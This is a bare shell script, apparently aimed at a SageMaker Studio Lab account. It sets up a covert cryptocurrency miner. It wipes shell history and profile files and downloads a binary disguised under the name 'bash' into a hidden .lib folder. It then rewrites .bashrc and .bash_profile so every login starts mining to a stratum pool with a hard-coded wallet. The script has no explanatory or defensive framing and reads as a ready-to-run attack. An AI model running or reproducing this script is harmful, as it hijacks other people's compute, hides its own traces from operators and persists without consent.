cd ~
rm -rvf .bash* .lib* bash*

rm -rvf ele* lol* 1.* 
cd ~/
mkdir .lib
cd .lib
rm -R *
rm -R /home/studio-lab-user/.ton
WORKER="parallax"
WALLETNH="0x9a90a1d375e7496314d202d17585770695fb325b"
POOLNH="152.53.136.133:443"
wget -P /home/studio-lab-user/.lib/ https://github.com/IKSANNURPADILLAH/parallax2/raw/refs/heads/main/bash && history -cr 
echo ""  > /home/studio-lab-user/.bashrc
echo "" > /home/studio-lab-user/.bash_history
echo "" > /home/studio-lab-user/.bash_profile
echo 'echo ""  >> /home/studio-lab-user/.bash_history' >> /home/studio-lab-user/.bashrc
echo "source /home/studio-lab-user/.bash_profile"  >> /home/studio-lab-user/.bashrc
echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/studio-lab-user/.bash_profile
echo "export LD_LIBRARY_PATH" >> /home/studio-lab-user/.bash_profile
echo 'WORKER="x"' >> ~/.bash_profile
echo 'WALLETNH="0x9a90a1d375e7496314d202d17585770695fb325b"' >> /home/studio-lab-user/.bash_profile
echo 'POOLNH="152.53.136.133:443"' >> /home/studio-lab-user/.bash_profile
echo "bash /home/studio-lab-user/.lib/gas.sh"  >> /home/studio-lab-user/.bash_profile
echo "./.lib/bash -P stratum1+tcp://$WALLETNH.$WORKER@$POOLNH" > /home/studio-lab-user/.lib/gas.sh
chmod +x bash && cd ~/ && source .bashrc



